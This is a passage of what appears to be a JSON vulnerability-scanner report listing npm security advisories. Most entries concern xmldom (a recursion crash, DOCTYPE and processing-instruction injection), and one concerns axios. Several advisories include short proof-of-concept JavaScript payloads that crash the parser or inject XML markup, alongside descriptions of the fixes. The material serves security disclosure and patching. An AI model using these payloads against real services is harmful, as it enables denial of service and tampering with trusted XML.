0.9.10", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-41673", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:836af0d1bc0c9bde54bf01f90bff1f3dcce11a7160e53ef1b64262f971e569fd", "Title": "xmldom: Uncontrolled recursion in XML serialization leads to DoS", "Description": "## Summary\n\nSeven recursive traversals in `lib/dom.js` operate without a depth limit. A sufficiently deeply\nnested DOM tree causes a `RangeError: Maximum call stack size exceeded`, crashing the application.\n\n**Reported operations:**\n- `Node.prototype.normalize()` — reported by @praveen-kv (email 2026-04-05) and @KarimTantawey (GHSA-fwmp-8wwc-qhv6, via `DOMParser.parseFromString()`)\n- `XMLSerializer.serializeToString()` — reported by @Jvr2022 (GHSA-2v35-w6hq-6mfw) and @KarimTantawey (GHSA-j2hf-fqwf-rrjf)\n\n**Additionally, discovered in research:**\n- `Element.getElementsByTagName()` / `getElementsByTagNameNS()` / `getElementsByClassName()` / `getElementById()`\n- `Node.cloneNode(true)`\n- `Document.importNode(node, true)`\n- `node.textContent` (getter)\n- `Node.isEqualNode(other)`\n\nAll seven share the same root cause: pure-JavaScript recursive tree traversal with no depth guard.\nA single deeply nested document (parsed successfully) triggers any or all of these operations.\n\n---\n\n## Details\n\n### Root cause\n\n`lib/dom.js` implements DOM tree traversals as depth-first recursive functions. Each level of\nelement nesting adds one JavaScript call frame. The JS engine's call stack is finite; once\nexhausted, a `RangeError: Maximum call stack size exceeded` is thrown. This error may not be\ncaught reliably at stack-exhaustion depths because the catch handler itself requires stack\nframes to execute — especially in async scenarios, where an uncaught `RangeError` inside a\ncallback or promise chain can crash the entire Node.js process.\n\nParsing a deeply nested document **succeeds** — the SAX parser in `lib/sax.js` is iterative.\nThe crash occurs during subsequent operations on the parsed DOM.\n\n### `Node.prototype.normalize()` — reported by @praveen-kv\n\n[`lib/dom.js:1296–1308`](https://github.com/xmldom/xmldom/blob/9ef2fd297ca527a05ecb11979850317a927cd20c/lib/dom.js#L1296-L1308) (main):\n\n```js\nnormalize: function () {\n var child = this.firstChild;\n while (child) {\n var next = child.nextSibling;\n if (next \u0026\u0026 next.nodeType == TEXT_NODE \u0026\u0026 child.nodeType == TEXT_NODE) {\n this.removeChild(next);\n child.appendData(next.data);\n } else {\n child.normalize(); // recursive call — no depth guard\n child = next;\n }\n }\n},\n```\n\nCrash threshold (Node.js 18, default stack): ~10,000 levels.\n\n### `XMLSerializer.serializeToString()` — reported by @Jvr2022\n\n[`lib/dom.js:2790–2974`](https://github.com/xmldom/xmldom/blob/9ef2fd297ca527a05ecb11979850317a927cd20c/lib/dom.js#L2790-L2974) (main):\nThe internal `serializeToString` worker recurses into child nodes at four call sites, each\npassing a `visibleNamespaces.slice()` copy. The per-frame allocation causes earlier stack\nexhaustion than `normalize()`.\n\nCrash threshold (Node.js 18, default stack): ~5,000 levels.\n\n### Additional recursive entry points\n\nAll five crash at ~10,000 levels on Node.js 18.\n\n| Function | Definition | Public API entry point(s) | Crash depth (Node.js 18) |\n|-----------------------------|----------------------------------------------------------------------------------------------------------------------|------------------------------------------------------------------------------------------------------|--------------------------|\n| `_visitNode` | [`lib/dom.js:1529`](https://github.com/xmldom/xmldom/blob/9ef2fd297ca527a05ecb11979850317a927cd20c/lib/dom.js#L1529) | `getElementsByTagName()`, `getElementsByTagNameNS()`, `getElementsByClassName()`, `getElementById()` | ~10,000 levels |\n| `cloneNode` (module fn) | [`lib/dom.js:3037`](https://github.com/xmldom/xmldom/blob/9ef2fd297ca527a05ecb11979850317a927cd20c/lib/dom.js#L3037) | `Node.prototype.cloneNode(true)` | ~10,000 levels |\n| `importNode` (module fn) | [`lib/dom.js:2975`](https://github.com/xmldom/xmldom/blob/9ef2fd297ca527a05ecb11979850317a927cd20c/lib/dom.js#L2975) | `Document.prototype.importNode(node, true)` | ~10,000 levels |\n| `getTextContent` (inner fn) | [`lib/dom.js:3130`](https://github.com/xmldom/xmldom/blob/9ef2fd297ca527a05ecb11979850317a927cd20c/lib/dom.js#L3130) | `node.textContent` (getter) | ~10,000 levels |\n| `isEqualNode` | [`lib/dom.js:1120`](https://github.com/xmldom/xmldom/blob/9ef2fd297ca527a05ecb11979850317a927cd20c/lib/dom.js#L1120) | `Node.prototype.isEqualNode(other)` | ~10,000 levels |\n\nBoth active branches (`main` and `release-0.8.x`) are identically affected. The unscoped `xmldom`\npackage (≤ 0.6.0) carries the same recursive patterns from its initial commit.\n\n### Browser behavior\n\nTested with Chromium 147 (Playwright headless). Chromium's native C++ implementations of all\nseven DOM methods are **iterative** — they traverse the DOM without consuming JS call stack frames.\nAll seven succeed at depths up to 20,000 without any crash.\n\nWhen `@xmldom/xmldom` is bundled and run in a browser context the same recursive JS code executes\nunder the browser's V8 stack limit (~12,000–13,000 frames). The crash thresholds are similar to\nthose observed on Node.js 18 (~5,000 for `serializeToString`, ~10,000 for the remaining six).\n\nThe vulnerability is specific to xmldom's pure-JavaScript recursive implementation, not an\ninherent property of the DOM operations.\n\n---\n\n## PoC\n\n### `normalize()` (from @praveen-kv report, 2026-04-05)\n\n```js\nconst { DOMParser } = require('@xmldom/xmldom');\n\nfunction generateNestedXML(depth) {\n return '\u003croot\u003e' + '\u003ca\u003e'.repeat(depth) + 'text' + '\u003c/a\u003e'.repeat(depth) + '\u003c/root\u003e';\n}\n\nconst doc = new DOMParser().parseFromString(generateNestedXML(10000), 'text/xml');\ndoc.documentElement.normalize();\n// RangeError: Maximum call stack size exceeded\n```\n\n### `XMLSerializer.serializeToString()` (from GHSA-2v35-w6hq-6mfw)\n\n```js\nconst { DOMParser, XMLSerializer } = require('@xmldom/xmldom');\n\nconst depth = 5000;\nconst xml = '\u003ca\u003e'.repeat(depth) + '\u003c/a\u003e'.repeat(depth);\nconst doc = new DOMParser().parseFromString(xml, 'text/xml');\nnew XMLSerializer().serializeToString(doc);\n// RangeError: Maximum call stack size exceeded\n```\n\nThe other methods have been verified using similar pocs.\n\n---\n\n## Impact\n\nAny service that accepts attacker-controlled XML and subsequently calls any of the seven affected\nDOM operations can be forced into a reliable denial of service with a single crafted payload.\n\nThe immediate result is an uncaught `RangeError` and failed request processing. In deployments\nwhere uncaught exceptions terminate the worker or process, the impact can extend beyond a single\nrequest and disrupt service availability more broadly.\n\nNo authentication, special options, or invalid XML is required. A valid, deeply nested XML\ndocument is enough.\n\n---\n\n## Disclosure\n\nThe `normalize()` vector was publicly disclosed at 2026-04-06T11:25:07Z via\n[xmldom/xmldom#987](https://github.com/xmldom/xmldom/pull/987) (closed without merge).\n`serializeToString()` and the five additional recursive entry points were not mentioned in that PR.\n\n---\n\n## Fix Applied\n\nAll seven affected traversals have been converted from recursive to iterative implementations, eliminating call-stack consumption on deep trees.\n\n### `walkDOM` utility\n\nA new `walkDOM(node, context, callbacks)` utility is introduced. It traverses the subtree rooted at `node` in depth-first order using an explicit JavaScript array as a stack, consuming heap memory instead of call-stack frames. `context` is an arbitrary value threaded through the walk — each `callbacks.enter(node, context)` call returns the context to pass to that node's children, enabling per-branch state (e.g. namespace snapshots in the serializer). `callbacks.exit(node, context)` (optional) is called in post-order after all children have been visited.\n\nThe following six operations are re-implemented on top of `walkDOM`:\n\n| Operation | Public entry point(s) |\n|---|---|\n| `_visitNode` helper | `getElementsByTagName()`, `getElementsByTagNameNS()`, `getElementsByClassName()`, `getElementById()` |\n| `getTextContent` inner function | `node.textContent` getter |\n| `cloneNode` module function | `Node.prototype.cloneNode(true)` |\n| `importNode` module function | `Document.prototype.importNode(node, true)` |\n| `serializeToString` worker | `XMLSerializer.prototype.serializeToString()`, `Node.prototype.toString()`, `NodeList.prototype.toString()` |\n| `normalize` | `Node.prototype.normalize()` |\n\n`normalize` uses `walkDOM` with a `null` context and an `enter` callback that merges adjacent Text children of the current node before `walkDOM` reads and queues those children — so the surviving post-merge children are what the walker descends into.\n\n### Custom iterative loop for `isEqualNode`\n\nOne function cannot use `walkDOM`:\n\n**`Node.prototype.isEqualNode(other)`** (0.9.x only; absent from 0.8.x) compares two trees in parallel. It maintains an explicit stack of `{node, other}` node pairs — one node from each tree — which cannot be expressed with `walkDOM`'s single-tree visitor.\n\n### After the fix\n\nAll seven entry points succeed on trees of arbitrary depth without throwing `RangeError`. The original PoCs still demonstrate the vulnerability on unpatched versions and confirm the fix on patched versions.", "Severity": "HIGH", "VendorSeverity": { "ghsa": 3 }, "CVSS": { "ghsa": { "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N", "V40Score": 8.7 } }, "References": [ "https://github.com/xmldom/xmldom", "https://github.com/xmldom/xmldom/commit/17678a2a73ecbd1a2da90f3d47dc23da9cef81aa", "https://github.com/xmldom/xmldom/commit/291257493cb0eb6980eda83b162a9c4e6d7d2597", "https://github.com/xmldom/xmldom/commit/2d6d6916ed8a4c223db1f6d7560ab4544c465b0f", "https://github.com/xmldom/xmldom/commit/430357c7b6333108856e917bf2367afe5ceb6f8a", "https://github.com/xmldom/xmldom/commit/4845ef109221df0890825de2822fbe77afba3afe", "https://github.com/xmldom/xmldom/commit/8834218c85ac2a4d757b9587c9028e67c2f7b6c3", "https://github.com/xmldom/xmldom/commit/8b7cfd1491314abdc347261921d7334ff15f7112", "https://github.com/xmldom/xmldom/commit/b0620383abc1df067f3ce1014c43ae1bc1161eeb", "https://github.com/xmldom/xmldom/commit/e6edcab6bef5bcdba0b220bb35442aa72f452b84", "https://github.com/xmldom/xmldom/releases/tag/0.8.13", "https://github.com/xmldom/xmldom/releases/tag/0.9.10", "https://github.com/xmldom/xmldom/security/advisories/GHSA-2v35-w6hq-6mfw" ] }, { "VulnerabilityID": "CVE-2026-41674", "VendorIDs": [ "GHSA-f6ww-3ggp-fr8h" ], "PkgID": "@xmldom/xmldom@0.8.11", "PkgName": "@xmldom/xmldom", "PkgIdentifier": { "PURL": "pkg:npm/%40xmldom/xmldom@0.8.11", "UID": "f9e98e014475aea3" }, "InstalledVersion": "0.8.11", "FixedVersion": "0.8.13, 0.9.10", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-41674", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:c3a3881def60c69753d530bb5f988ce7bb45ccddbc9e86671eadaede3d6f53db", "Title": "xmldom has XML injection through unvalidated DocumentType serialization", "Description": "## Summary\n\nThe package serializes `DocumentType` node fields (`internalSubset`, `publicId`, `systemId`) verbatim\nwithout any escaping or validation. When these fields are set programmatically to attacker-controlled\nstrings, `XMLSerializer.serializeToString` can produce output where the DOCTYPE declaration is\nterminated early and arbitrary markup appears outside it.\n\n---\n\n## Details\n\n`DOMImplementation.createDocumentType(qualifiedName, publicId, systemId, internalSubset)` validates\nonly `qualifiedName` against the XML QName production. The remaining three arguments are stored\nas-is with no validation.\n\nThe XMLSerializer emits `DocumentType` nodes as:\n\n```\n\u003c!DOCTYPE name[ PUBLIC pubid][ SYSTEM sysid][ [internalSubset]]\u003e\n```\n\nAll fields are pushed into the output buffer verbatim — no escaping, no quoting added.\n\n**`internalSubset` injection:** The serializer wraps `internalSubset` with ` [` and `]`. A value\ncontaining `]\u003e` closes the internal subset and the DOCTYPE declaration at the injection point.\nAny content after `]\u003e` in `internalSubset` appears outside the DOCTYPE in the serialized output as\nraw XML markup. Reported by @TharVid (GHSA-f6ww-3ggp-fr8h). Affected: `@xmldom/xmldom` ≥ 0.9.0\nvia `createDocumentType` API; 0.8.x only via direct property write.\n\n**`publicId` injection:** The serializer emits `publicId` verbatim after `PUBLIC` with no\nquoting added. A value containing an injected system identifier (e.g.,\n`\"pubid\" SYSTEM \"evil\"`) breaks the intended quoting context, injecting a fake SYSTEM entry\ninto the serialized DOCTYPE declaration. Identified during internal security research. Affected:\nboth branches, all versions back to 0.1.0.\n\n**`systemId` injection:** The serializer emits `systemId` verbatim. A value containing `\u003e`\nterminates the DOCTYPE declaration early; content after `\u003e` appears as raw XML markup outside\nthe DOCTYPE context. Identified during internal security research. Affected: both branches, all\nversions back to 0.1.0.\n\nThe parse path is safe: the SAX parser enforces the `PubidLiteral` and `SystemLiteral` grammar\nproductions, which exclude the relevant characters, and the internal subset parser only accepts a\nsubset it can structurally validate. The vulnerability is reachable only through programmatic\n`createDocumentType` calls with attacker-controlled arguments.\n\n---\n\n## Affected code\n\n**`lib/dom.js` — `createDocumentType` (lines 898–910):**\n\n```js\ncreateDocumentType: function (qualifiedName, publicId, systemId, internalSubset) {\n validateQualifiedName(qualifiedName); // only qualifiedName is validated\n var node = new DocumentType(PDC);\n node.name = qualifiedName;\n node.nodeName = qualifiedName;\n node.publicId = publicId || ''; // stored verbatim\n node.systemId = systemId || ''; // stored verbatim\n node.internalSubset = internalSubset || ''; // stored verbatim\n node.childNodes = new NodeList();\n return node;\n},\n```\n\n**`lib/dom.js` — serializer DOCTYPE case (lines 2948–2964):**\n\n```js\ncase DOCUMENT_TYPE_NODE:\n var pubid = node.publicId;\n var sysid = node.systemId;\n buf.push(g.DOCTYPE_DECL_START, ' ', node.name);\n if (pubid) {\n buf.push(' ', g.PUBLIC, ' ', pubid);\n if (sysid \u0026\u0026 sysid !== '.') {\n buf.push(' ', sysid);\n }\n } else if (sysid \u0026\u0026 sysid !== '.') {\n buf.push(' ', g.SYSTEM, ' ', sysid);\n }\n if (node.internalSubset) {\n buf.push(' [', node.internalSubset, ']'); // internalSubset emitted verbatim\n }\n buf.push('\u003e');\n return;\n```\n\n---\n\n## PoC\n\n### internalSubset injection\n\n```js\nconst { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');\n\nconst impl = new DOMImplementation();\nconst doctype = impl.createDocumentType(\n 'root',\n '',\n '',\n ']\u003e\u003cinjected/\u003e\u003c![CDATA['\n);\nconst doc = impl.createDocument(null, 'root', doctype);\nconst xml = new XMLSerializer().serializeToString(doc);\nconsole.log(xml);\n// \u003c!DOCTYPE root []\u003e\u003cinjected/\u003e\u003c![CDATA[]\u003e\u003croot/\u003e\n// ^^^^^^^^^^ injected element outside DOCTYPE\n```\n\n### publicId quoting context break\n\n```js\nconst { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');\n\nconst impl = new DOMImplementation();\nconst doctype = impl.createDocumentType(\n 'root',\n '\"injected PUBLIC_ID\" SYSTEM \"evil\"',\n '',\n ''\n);\nconst doc = impl.createDocument(null, 'root', doctype);\nconsole.log(new XMLSerializer().serializeToString(doc));\n// \u003c!DOCTYPE root PUBLIC \"injected PUBLIC_ID\" SYSTEM \"evil\"\u003e\u003croot/\u003e\n// quoting context broken — SYSTEM entry injected\n```\n\n### systemId injection\n\n```js\nconst { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');\n\nconst impl = new DOMImplementation();\nconst doctype = impl.createDocumentType(\n 'root',\n '',\n '\"sysid\"\u003e\u003cinjected attr=\"pwn\"/\u003e',\n ''\n);\nconst doc = impl.createDocument(null, 'root', doctype);\nconsole.log(new XMLSerializer().serializeToString(doc));\n// \u003c!DOCTYPE root SYSTEM \"sysid\"\u003e\u003cinjected attr=\"pwn\"/\u003e\u003e\u003croot/\u003e\n// \u003e in sysid closes DOCTYPE early; \u003cinjected/\u003e appears as sibling element\n```\n\n---\n\n## Impact\n\nAn application that programmatically constructs `DocumentType` nodes from user-controlled data and\nthen serializes the document can emit a DOCTYPE declaration where the internal subset is closed\nearly or where injected SYSTEM entities or other declarations appear in the serialized output.\n\nDownstream XML parsers that re-parse the serialized output and expand entities from the injected\nDOCTYPE declarations may be susceptible to XXE-class attacks if they enable entity expansion.\n\n---\n\n## Fix Applied\n\n\u003e **⚠ Opt-in required.** Protection is not automatic. Existing serialization calls remain\n\u003e vulnerable unless `{ requireWellFormed: true }` is explicitly passed. Applications that pass\n\u003e untrusted data to `createDocumentType()` or write untrusted values directly to a\n\u003e `DocumentType` node's `publicId`, `systemId`, or `internalSubset` properties should audit\n\u003e all `serializeToString()` call sites and add the option.\n\n`XMLSerializer.serializeToString()` now accepts an options object as a second argument. When `{ requireWellFormed: true }` is passed, the serializer validates the `DocumentType` node's `publicId`, `systemId`, and `internalSubset` fields before emitting the DOCTYPE declaration and throws `InvalidStateError` if any field contains an injection sequence:\n\n- **`publicId`**: throws if non-empty and does not match the XML `PubidLiteral` production (XML 1.0 [12])\n- **`systemId`**: throws if non-empty and does not match the XML `SystemLiteral` production (XML 1.0 [11])\n- **`internalSubset`**: throws if it contains `]\u003e` (which closes the internal subset and DOCTYPE declaration early)\n\nAll three checks apply regardless of how the invalid value entered the node — whether via `createDocumentType` arguments or a subsequent direct property write.\n\n### PoC — fixed path\n\n```js\nconst { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');\nconst impl = new DOMImplementation();\n\n// internalSubset injection\nconst dt1 = impl.createDocumentType('root', '', '', ']\u003e\u003cinjected/\u003e\u003c![CDATA[');\nconst doc1 = impl.createDocument(null, 'root', dt1);\n\n// Default (unchanged): verbatim — injection present\nconsole.log(new XMLSerializer().serializeToString(doc1));\n// \u003c!DOCTYPE root []\u003e\u003cinjected/\u003e\u003c![CDATA[]\u003e\u003croot/\u003e\n\n// Opt-in guard: throws InvalidStateError\ntry {\n new XMLSerializer().serializeToString(doc1, { requireWellFormed: true });\n} catch (e) {\n console.log(e.name, e.message);\n // InvalidStateError: DocumentType internalSubset contains \"]\u003e\"\n}\n```\n\nThe guard also covers post-creation property writes:\n\n```js\nconst dt2 = impl.createDocumentType('root', '', '');\ndt2.systemId = '\"sysid\"\u003e\u003cinjected attr=\"pwn\"/\u003e';\nconst doc2 = impl.createDocument(null, 'root', dt2);\nnew XMLSerializer().serializeToString(doc2, { requireWellFormed: true });\n// InvalidStateError: DocumentType systemId is not a valid SystemLiteral\n```\n\n### Why the default stays verbatim\n\nThe W3C DOM Parsing and Serialization spec §3.2.1.3 defines a `require well-formed` flag whose **default value is `false`**. With the flag unset, the spec permits verbatim serialization of DOCTYPE fields. Unconditionally throwing would be a behavioral breaking change with no spec justification. The opt-in `requireWellFormed: true` flag allows applications that require injection safety to enable strict mode without breaking existing deployments.\n\n### Residual limitation\n\n`createDocumentType(qualifiedName, publicId, systemId[, internalSubset])` does not validate `publicId`, `systemId`, or `internalSubset` at creation time. This creation-time validation is a breaking change and is deferred to a future breaking release.\n\nWhen the default serialization path is used (without `requireWellFormed: true`), all three fields are still emitted verbatim. Applications that do not pass `requireWellFormed: true` remain exposed.", "Severity": "HIGH", "VendorSeverity": { "ghsa": 3 }, "CVSS": { "ghsa": { "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N", "V40Score": 8.7 } }, "References": [ "https://github.com/xmldom/xmldom", "https://github.com/xmldom/xmldom/commit/372008f9ae0e20fd69f761c7b79e202598267314", "https://github.com/xmldom/xmldom/releases/tag/0.8.13", "https://github.com/xmldom/xmldom/releases/tag/0.9.10", "https://github.com/xmldom/xmldom/security/advisories/GHSA-f6ww-3ggp-fr8h" ] }, { "VulnerabilityID": "CVE-2026-41675", "VendorIDs": [ "GHSA-x6wf-f3px-wcqx" ], "PkgID": "@xmldom/xmldom@0.8.11", "PkgName": "@xmldom/xmldom", "PkgIdentifier": { "PURL": "pkg:npm/%40xmldom/xmldom@0.8.11", "UID": "f9e98e014475aea3" }, "InstalledVersion": "0.8.11", "FixedVersion": "0.8.13, 0.9.10", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-41675", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:77caf4d99528b5130227d79088c1d056861b199c81777e384d644cf02d8d558f", "Title": "xmldom has XML node injection through unvalidated processing instruction serialization", "Description": "## Summary\n\nThe package allows attacker-controlled processing instruction data to be serialized into XML without validating or neutralizing the PI-closing sequence `?\u003e`. As a result, an attacker can terminate the processing instruction early and inject arbitrary XML nodes into the serialized output.\n\n---\n\n## Details\n\nThe issue is in the DOM construction and serialization flow for processing instruction nodes.\n\nWhen `createProcessingInstruction(target, data)` is called, the supplied `data` string is stored directly on the node without validation. Later, when the document is serialized, the serializer writes PI nodes by concatenating `\u003c?`, the target, a space, `node.data`, and `?\u003e` directly.\n\nThat behavior is unsafe because processing instructions are a syntax-sensitive context. The closing delimiter `?\u003e` terminates the PI. If attacker-controlled input contains `?\u003e`, the serializer does not preserve it as literal PI content. Instead, it emits output where the remainder of the payload is treated as live XML markup.\n\nThe same class of vulnerability was previously addressed for CDATA sections (GHSA-wh4c-j3r5-mjhp / CVE-2026-34601), where `]]\u003e` in CDATA data was handled by splitting. The serializer applies no equivalent protection to processing instruction data.\n\n---\n\n## Affected code\n\n**`lib/dom.js` — `createProcessingInstruction` (lines 2240–2246):**\n\n```js\ncreateProcessingInstruction: function (target, data) {\n var node = new ProcessingInstruction(PDC);\n node.ownerDocument = this;\n node.childNodes = new NodeList();\n node.nodeName = node.target = target;\n node.nodeValue = node.data = data;\n return node;\n},\n```\n\nNo validation is performed on `data`. Any string including `?\u003e` is stored as-is.\n\n**`lib/dom.js` — serializer PI case (line 2966):**\n\n```js\ncase PROCESSING_INSTRUCTION_NODE:\n return buf.push('\u003c?', node.target, ' ', node.data, '?\u003e');\n```\n\n`node.data` is emitted verbatim. If it contains `?\u003e`, that sequence terminates the PI in the output\nstream and the remainder appears as active XML markup.\n\n**Contrast — CDATA (line 2945, patched):**\n\n```js\ncase CDATA_SECTION_NODE:\n return buf.push(g.CDATA_START, node.data.replace(/]]\u003e/g, ']]]]\u003e\u003c![CDATA[\u003e'), g.CDATA_END);\n```\n\n---\n\n## PoC\n\n### Minimal (from @tlsbollei report, 2026-04-01)\n\n```js\nconst { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');\n\nconst doc = new DOMImplementation().createDocument(null, 'r', null);\ndoc.documentElement.appendChild(\n doc.createProcessingInstruction('a', '?\u003e\u003cz/\u003e\u003c?q ')\n);\nconsole.log(new XMLSerializer().serializeToString(doc));\n// \u003cr\u003e\u003c?a ?\u003e\u003cz/\u003e\u003c?q ?\u003e\u003c/r\u003e\n// ^^^^ injected \u003cz/\u003e element is active markup\n```\n\n### With re-parse verification (from @tlsbollei report)\n\n```js\nconst assert = require('assert');\nconst { DOMParser, XMLSerializer } = require('@xmldom/xmldom');\n\nconst doc = new DOMParser().parseFromString('\u003cr/\u003e', 'application/xml');\ndoc.documentElement.appendChild(doc.createProcessingInstruction('a', '?\u003e\u003cz/\u003e\u003c?q '));\nconst xml = new XMLSerializer().serializeToString(doc);\nassert.strictEqual(new DOMParser().parseFromString(xml, 'application/xml')\n .getElementsByTagName('z').length, 1); // passes — z is a real element\n```\n\n---\n\n## Impact\n\nAn application that uses the package to build XML from untrusted input can be made to emit attacker-controlled elements outside the intended PI boundary. That allows the attacker to alter the meaning and structure of generated XML documents.\n\nIn practice, this can affect any workflow that generates XML and then stores it, forwards it, signs it, or hands it to another parser. Realistic targets include XML-based configuration, policy documents, and message formats where downstream consumers trust the serialized structure.\n\nAs noted by @tlsbollei: this is the same delimiter-driven XML injection bug class previously addressed by GHSA-wh4c-j3r5-mjhp for `createCDATASection()`. Fixing CDATA while leaving PI creation and PI serialization unguarded leaves the same standards-constrained issue open for another node type.\n\n---\n\n## Disclosure\n\nThis vulnerability was publicly disclosed at 2026-04-06T11:25:07Z via\n[xmldom/xmldom#987](https://github.com/xmldom/xmldom/pull/987), which was subsequently closed\nwithout being merged.\n\n---\n\n## Fix Applied\n\n\u003e **⚠ Opt-in required.** Protection is not automatic. Existing serialization calls remain\n\u003e vulnerable unless `{ requireWellFormed: true }` is explicitly passed. Applications that pass\n\u003e untrusted data to `createProcessingInstruction()` or mutate PI nodes with untrusted input\n\u003e (via `.data =` or `CharacterData` mutation methods) should audit all `serializeToString()`\n\u003e call sites and add the option.\n\n`XMLSerializer.serializeToString()` now accepts an options object as a second argument. When `{ requireWellFormed: true }` is passed, the serializer throws `InvalidStateError` before emitting any ProcessingInstruction node whose `.data` contains `?\u003e`. This check applies regardless of how `?\u003e` entered the node — whether via `createProcessingInstruction` directly or a subsequent mutation (`.data =`, `CharacterData` methods).\n\nOn `@xmldom/xmldom` ≥ 0.9.10, the serializer additionally applies the full W3C DOM Parsing §3.2.1.7 checks when `requireWellFormed: true`:\n\n1. **Target check**: throws `InvalidStateError` if the PI target contains a `:` character or is an ASCII case-insensitive match for `\"xml\"`.\n2. **Data Char check**: throws `InvalidStateError` if the PI data contains characters outside the XML Char production.\n3. **Data sequence check**: throws `InvalidStateError` if the PI data contains `?\u003e`.\n\nOn `@xmldom/xmldom` ≥ 0.8.13 (LTS), only the `?\u003e` data check (check 3) is applied. The target and XML Char checks are not included in the LTS fix.\n\n### PoC — fixed path\n\n```js\nconst { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');\n\nconst doc = new DOMImplementation().createDocument(null, 'r', null);\ndoc.documentElement.appendChild(doc.createProcessingInstruction('a', '?\u003e\u003cz/\u003e\u003c?q '));\n\n// Default (unchanged): verbatim — injection present\nconst unsafe = new XMLSerializer().serializeToString(doc);\nconsole.log(unsafe);\n// \u003cr\u003e\u003c?a ?\u003e\u003cz/\u003e\u003c?q ?\u003e\u003c/r\u003e\n\n// Opt-in guard: throws InvalidStateError before serializing\ntry {\n new XMLSerializer().serializeToString(doc, { requireWellFormed: true });\n} catch (e) {\n console.log(e.name, e.message);\n // InvalidStateError: The ProcessingInstruction data contains \"?\u003e\"\n}\n```\n\nThe guard catches `?\u003e` regardless of when it was introduced:\n\n```js\n// Post-creation mutation: also caught at serialization time\nconst pi = doc.createProcessingInstruction('target', 'safe data');\ndoc.documentElement.appendChild(pi);\npi.data = 'safe?\u003e\u003cinjected/\u003e';\nnew XMLSerializer().serializeToString(doc, { requireWellFormed: true });\n// InvalidStateError: The ProcessingInstruction data contains \"?\u003e\"\n```\n\n### Why the default stays verbatim\n\nThe W3C DOM Parsing and Serialization spec §3.2.1.3 defines a `require well-formed` flag whose **default value is `false`**. With the flag unset, the spec explicitly permits serializing PI data verbatim. This matches browser behavior: Chrome, Firefox, and Safari all emit `?\u003e` in PI data verbatim by default without error.\n\nUnconditionally throwing would be a behavioral breaking change with no spec justification. The opt-in `requireWellFormed: true` flag allows applications that require injection safety to enable strict mode without breaking existing code.\n\n### Residual limitation\n\n`createProcessingInstruction(target, data)` does not validate `data` at creation time. The WHATWG DOM spec (§4.5 step 2) mandates an `InvalidCharacterError` when `data` contains `?\u003e`; enforcing this check unconditionally at creation time is a breaking change and is deferred to a future breaking release.\n\nWhen the default serialization path is used (without `requireWellFormed: true`), PI data containing `?\u003e` is still emitted verbatim. Applications that do not pass `requireWellFormed: true` remain exposed.", "Severity": "HIGH", "VendorSeverity": { "ghsa": 3 }, "CVSS": { "ghsa": { "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N", "V40Score": 8.7 } }, "References": [ "https://github.com/xmldom/xmldom", "https://github.com/xmldom/xmldom/commit/7207a4b0e0bcc228868075ed991665ef9f73b1c2", "https://github.com/xmldom/xmldom/releases/tag/0.8.13", "https://github.com/xmldom/xmldom/releases/tag/0.9.10", "https://github.com/xmldom/xmldom/security/advisories/GHSA-x6wf-f3px-wcqx" ] }, { "VulnerabilityID": "CVE-2026-25639", "VendorIDs": [ "GHSA-43fc-jf86-j433" ], "PkgID": "axios@1.12.2", "PkgName": "axios", "PkgIdentifier": { "PURL": "pkg:npm/axios@1.12.2", "UID": "42b431016ae1856f" }, "InstalledVersion": "1.12.2", "FixedVersion": "1.13.5, 0.30.3", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-25639", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:d9d4c72adba41965ddc803d8068bcf0c61cfdc93361d9496ffb1b9112537b3b3", "Title": "axios: Axios affected by Denial of Service via __proto__ Key in mergeConfig", "Description": "Axios is a promise based HTTP client for the browser and Node.js. Prior to versions 0.30.3 and 1.13.5, the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service. This vulnerability is fixed in versions 0.30.3 and 1.13.5.", "Severity": "HIGH", "CweIDs": [ "CWE-754" ], "VendorSeverity": { "ghsa": 3, "redhat": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-25639", "https://github.com/axios/axios", "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57", "https://github.com/axios/axios/commit/d7ff1409c68168d3057fc3891f911b2b92616f9e", "https://github.com/axios/axios/pull/7369", "https://github.com/axios/axios/pull/7388", "https://github.com/axios/axios/releases/tag/v0.30.3", "https://github.com/axios/axios/releases/tag/v1.13.5", "https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433", "https://nvd.nist.gov/vuln/detail/CVE-2026-25639", 